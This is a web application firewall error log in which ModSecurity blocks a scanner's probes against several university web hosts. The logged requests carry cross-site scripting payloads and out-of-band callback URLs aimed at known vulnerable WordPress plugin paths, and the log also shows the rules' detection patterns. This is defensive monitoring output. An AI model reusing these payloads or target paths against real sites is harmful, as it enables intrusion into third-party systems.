[Tue Aug 29 11:53:55.814788 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:text: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/new-year-firework/firework/index.php"] [unique_id "ZO1548Co-f0AAAoW7WUAAAAJ"]
[Tue Aug 29 11:53:55.852451 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mod: list</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/cms/info.php"] [unique_id "ZO1548Co-f0AAAoAk2gAAAAC"]
[Tue Aug 29 11:53:55.852627 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/webadmin/authportal/bounce.php"] [unique_id "ZO1548Co-f0AAApOdcIAAAAL"]
[Tue Aug 29 11:53:55.860576 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:text: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/new-year-firework/firework/index.php"] [unique_id "ZO1548Co-f0AAAoW7WYAAAAJ"]
[Tue Aug 29 11:53:55.903668 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:text: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/new-year-firework/firework/index.php"] [unique_id "ZO1548Co-f0AAAoZ6U8AAAAK"]
[Tue Aug 29 11:53:56.560715 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:!'><sVg/OnLoAD. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: < found within ARGS_NAMES:!'><sVg/OnLoAD: !'><sVg/OnLoAD"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/Login"] [unique_id "ZO155MCo-f0AAApJDVUAAAAY"]
[Tue Aug 29 11:53:56.572260 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\\\s*?(?:all|distinct|[(!@]*?)?\\\\s*?[([]*?\\\\s*?select\\\\s+)|(?:\\\\w+\\\\s+like\\\\s+[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\%)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?like\\\\W*?[\\"'`\\xc2\\xb4 ..." at ARGS_NAMES:!'><sVg/OnLoAD. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: '><sVg/O found within ARGS_NAMES:!'><sVg/OnLoAD: !'><sVg/OnLoAD"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "ft.unla.ac.id"] [uri "/Login"] [unique_id "ZO155MCo-f0AAAoqbX4AAAAj"]
[Tue Aug 29 11:53:56.597357 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:text: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/new-year-firework/firework/index.php"] [unique_id "ZO155MCo-f0AAAoqbX8AAAAj"]
[Tue Aug 29 11:53:56.598772 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mod: list</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/cms/info.php"] [unique_id "ZO155MCo-f0AAApJDVYAAAAY"]
[Tue Aug 29 11:53:56.619322 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:error_description. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:error_description: <svg/onload=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php"] [unique_id "ZO155MCo-f0AAApJDVcAAAAY"]
[Tue Aug 29 11:53:56.627197 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:error_description. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:error_description: <svg/onload=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php"] [unique_id "ZO155MCo-f0AAAoZ6VEAAAAK"]
[Tue Aug 29 11:53:56.637515 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:error_description. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:error_description: <svg/onload=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php"] [unique_id "ZO155MCo-f0AAAoqbYAAAAAj"]
[Tue Aug 29 11:53:56.637566 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:error_description. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:error_description: <svg/onload=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php"] [unique_id "ZO155MCo-f0AAApOdcYAAAAL"]
[Tue Aug 29 11:53:56.640515 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:error_description. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:error_description: <svg/onload=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php"] [unique_id "ZO155MCo-f0AAAoUJe4AAAAB"]
[Tue Aug 29 11:53:57.581624 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:!'><sVg/OnLoAD. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: < found within ARGS_NAMES:!'><sVg/OnLoAD: !'><sVg/OnLoAD"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Login"] [unique_id "ZO155cCo-f0AAAoUJe8AAAAB"]
[Tue Aug 29 11:53:57.790396 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:error_description. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:error_description: <svg/onload=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php"] [unique_id "ZO155cCo-f0AAApLWlUAAAAI"]
[Tue Aug 29 11:54:00.545137 2023] [:error] [pid 2640] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:woof_redraw_elements[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:woof_redraw_elements[]: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO156MCo-f0AAApQ2VsAAAAb"]
[Tue Aug 29 11:54:00.556205 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:woof_redraw_elements[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:woof_redraw_elements[]: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO156MCo-f0AAAox7MsAAAAN"]
[Tue Aug 29 11:54:00.557243 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:woof_redraw_elements[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:woof_redraw_elements[]: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO156MCo-f0AAApOddAAAAAL"]
[Tue Aug 29 11:54:00.584075 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:woof_redraw_elements[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:woof_redraw_elements[]: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO156MCo-f0AAAo2m8sAAAAA"]
[Tue Aug 29 11:54:00.589773 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prodID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:prodID: '\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/PolicyMgmt/policyDetailsCard.do"] [unique_id "ZO156MCo-f0AAApHRX4AAAAP"]
[Tue Aug 29 11:54:00.601260 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:woof_redraw_elements[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:woof_redraw_elements[]: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO156MCo-f0AAApOddEAAAAL"]
[Tue Aug 29 11:54:00.602590 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:i. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:i: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/flash-album-gallery/facebook.php"] [unique_id "ZO156MCo-f0AAApLWlsAAAAI"]
[Tue Aug 29 11:54:00.625388 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prodID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:prodID: '\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/PolicyMgmt/policyDetailsCard.do"] [unique_id "ZO156MCo-f0AAApLWlwAAAAI"]
[Tue Aug 29 11:54:00.628129 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prodID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:prodID: '\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/PolicyMgmt/policyDetailsCard.do"] [unique_id "ZO156MCo-f0AAApJDWQAAAAY"]
[Tue Aug 29 11:54:00.636634 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:i. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:i: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/flash-album-gallery/facebook.php"] [unique_id "ZO156MCo-f0AAAoUJfoAAAAB"]
[Tue Aug 29 11:54:00.648220 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/inc/supportLoad.asp"] [unique_id "ZO156MCo-f0AAApOddMAAAAL"]
[Tue Aug 29 11:54:00.648662 2023] [:error] [pid 2639] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/inc/supportLoad.asp"] [unique_id "ZO156MCo-f0AAApPcvcAAAAa"]
[Tue Aug 29 11:54:00.650404 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:i. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:i: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/flash-album-gallery/facebook.php"] [unique_id "ZO156MCo-f0AAAoGFhkAAAAE"]
